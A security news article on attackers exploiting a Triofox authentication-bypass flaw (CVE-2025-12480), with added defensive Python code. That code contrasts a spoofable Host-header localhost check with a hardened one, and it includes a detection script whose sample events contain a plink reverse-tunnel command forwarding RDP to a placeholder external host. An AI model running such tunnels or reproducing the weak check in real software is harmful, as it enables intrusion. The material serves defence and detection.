A newly uncovered cyberattack targeting Gladinet’s Triofox file-sharing and remote-access platform has highlighted just how quickly threat actors can turn legitimate security features into powerful intrusion tools. According to fresh research from Google’s Threat Intelligence Group (GTIG) and Mandiant, a threat cluster tracked as UNC6485 has been exploiting a critical flaw—CVE-2025-12480—in Triofox to achieve remote code execution with SYSTEM privileges, enabling deep access into enterprise environments.
The vulnerability stems from a logic flaw in access control, where the platform grants admin privileges whenever a request appears to originate from “localhost.” Attackers can easily spoof this check by manipulating the HTTP Host header, allowing them to bypass authentication entirely. Mandiant warns that systems running default Triofox configurations, where the optional TrustedHostIp parameter is not configured, are especially exposed. A security patch addressing the flaw was included in version 16.7.10368.56560, though researchers stress that administrators should immediately update to version 16.10.10408.56683 released in October for full protection.
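To make the flaw class concrete from a reviewer's side, the following is an added illustration (not Triofox's code, and not taken from the GTIG or Mandiant write-ups) of why a "is this request local?" decision must never rest on the client-supplied Host header. It puts the weak check beside a hardened one that uses the transport-level peer address plus an explicit allowlist in the spirit of the TrustedHostIp setting the article mentions; the function names, the `trusted_host_ips` parameter and the exact allowlist semantics are assumptions for the example.

```python
"""Added example: client-controlled Host header vs. peer address for a
'local request' privilege check. Not Triofox's implementation; names and
the allowlist semantics are assumptions made for illustration."""
import ipaddress
from typing import Optional

LOCAL_HOSTNAMES = {"localhost", "127.0.0.1", "::1"}


def is_local_weak(headers: dict) -> bool:
    """Weak check: the Host header is whatever the client chose to send,
    so a remote caller can simply claim to be localhost."""
    host = headers.get("Host", "").split(":")[0].strip().lower()
    return host in LOCAL_HOSTNAMES


def is_local_hardened(remote_addr: str,
                      trusted_host_ips: Optional[set] = None) -> bool:
    """Hardened check: trust only the socket peer address (set by the TCP
    stack, not by request headers) and an explicit, operator-configured
    allowlist of additional addresses."""
    try:
        addr = ipaddress.ip_address(remote_addr)
    except ValueError:
        # Unparseable peer address: fail closed.
        return False
    if addr.is_loopback:
        return True
    return remote_addr in (trusted_host_ips or set())


def grant_admin(headers: dict, remote_addr: str,
                trusted_host_ips: Optional[set] = None,
                hardened: bool = True) -> bool:
    """Return True when the request would be treated as an admin request.
    `hardened=False` reproduces the weak behaviour for comparison only."""
    if hardened:
        return is_local_hardened(remote_addr, trusted_host_ips)
    return is_local_weak(headers)


if __name__ == "__main__":
    # Constructed request: Host header claims localhost, peer is remote.
    spoofed = {"Host": "localhost"}
    print("weak check grants admin:", grant_admin(spoofed, "203.0.113.5", hardened=False))
    print("hardened check grants admin:", grant_admin(spoofed, "203.0.113.5"))
```

The design point is that every field of an HTTP request is attacker-controlled; only properties established below the application layer (the accepted socket's peer address) or by operator configuration (an allowlist) are a sound basis for an authorization decision.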
GTIG discovered the malicious activity on August 24, when UNC6485 targeted a Triofox server running an April build of the software. After bypassing authentication, the attackers accessed Triofox’s AdminDatabase.aspx setup page, created a rogue admin account named “Cluster Admin,” and leveraged the product’s built-in antivirus scanner configuration to gain code execution. By redirecting the scanner to a malicious script they had uploaded, the threat actors ensured the file executed under SYSTEM privileges, giving them full control.
Once inside, the attackers deployed a batch script designed to launch a PowerShell downloader, which fetched a Zoho UEMS installer. From there, the attackers installed Zoho Assist and AnyDesk to maintain persistent remote access. They also introduced Plink and PuTTY to create SSH tunnels that forwarded traffic straight to the compromised host’s RDP port (3389), enabling stealthy lateral movement across the network.
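The two preceding paragraphs describe three things a defender can look for: an antivirus engine path that points at a script instead of a vendor binary, SSH tunnelling utilities forwarding to the RDP port, and interactive remote-access tools appearing on a file server. The following is an added example (not from the GTIG report) that runs those heuristics over a handful of constructed event records. The event schema, the `antivirus_engine_path` setting name, the allowed installation directories and the remote-access tool filenames are assumptions for the example; real IoCs should be taken from the report itself.

```python
"""Added detection example over constructed telemetry. Field names, the
antivirus path setting name and tool filenames are assumptions, not
Triofox's real schema or the report's IoCs."""
import re
from pathlib import PureWindowsPath

# Constructed sample events (illustrative, not real indicators).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
    {"type": "config", "setting": "antivirus_engine_path",      # hypothetical setting name
     "value": r"C:\Triofox\Uploads\scan.bat"},
    {"type": "process", "image": r"C:\Tools\plink.exe",
     "cmdline": "plink.exe -N -R 2222:127.0.0.1:3389 <user>@<external-host>"},
    {"type": "process", "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install"},
    {"type": "config", "setting": "antivirus_engine_path",
     "value": r"C:\Program Files\Vendor AV\scanner.exe"},
]

SCRIPT_EXTENSIONS = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}
ALLOWED_AV_DIRS = (r"C:\Program Files", r"C:\Program Files (x86)")  # assumed policy
TUNNEL_TOOLS = {"plink.exe", "putty.exe"}
REMOTE_ACCESS_TOOLS = {"anydesk.exe"}  # extend from the report's IoC list

# Port-forward flag (-R or -L) whose target ends in the RDP port.
_RDP_FORWARD = re.compile(r"-[RL]\s+\S*\b3389\b")


def suspicious_av_path(value: str) -> bool:
    """Flag a scanner path that is a script or lives outside vendor dirs."""
    path = PureWindowsPath(value)
    if path.suffix.lower() in SCRIPT_EXTENSIONS:
        return True
    lowered = str(path).lower()
    return not any(lowered.startswith(d.lower()) for d in ALLOWED_AV_DIRS)


def rdp_tunnel(image: str, cmdline: str) -> bool:
    """Flag plink/putty invocations that forward traffic to port 3389."""
    name = PureWindowsPath(image).name.lower()
    return name in TUNNEL_TOOLS and bool(_RDP_FORWARD.search(cmdline))


def scan(events):
    """Return (rule, evidence) tuples for every event a heuristic matches."""
    findings = []
    for ev in events:
        if ev["type"] == "config":
            if ev["setting"] == "antivirus_engine_path" and suspicious_av_path(ev["value"]):
                findings.append(("av_engine_path_is_script_or_untrusted", ev["value"]))
        elif ev["type"] == "process":
            if rdp_tunnel(ev["image"], ev["cmdline"]):
                findings.append(("ssh_tunnel_to_rdp", ev["cmdline"]))
            elif PureWindowsPath(ev["image"]).name.lower() in REMOTE_ACCESS_TOOLS:
                findings.append(("remote_access_tool_on_server", ev["image"]))
    return findings


if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The antivirus-path rule is the one worth wiring into a periodic audit of the application's configuration, since it directly covers the "audit their antivirus engine paths" advice in the conclusion; the process rules belong in endpoint telemetry and should be tuned to the host's legitimate software inventory.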
Post-exploitation analysis revealed classic tradecraft: privilege escalation, remote tool deployment, and covert tunneling. GTIG’s report includes an extensive list of Indicators of Compromise (IoCs) that administrators should monitor immediately. The broader context is troubling—just last month, Huntress warned that attackers were exploiting another Gladinet zero-day (CVE-2025-11371) affecting Triofox and CentreStack products.
Conclusion:
The Triofox incident underscores how quickly cybercriminals exploit weak authentication flows and misconfigured security features. Organizations using Triofox must patch without delay, review all admin accounts, and audit their antivirus engine paths to ensure no unauthorized scripts are executed. As attackers increasingly blend zero-day exploitation with endpoint management tools and tunneling utilities, proactive monitoring and rapid patching remain critical defenses against modern intrusion campaigns.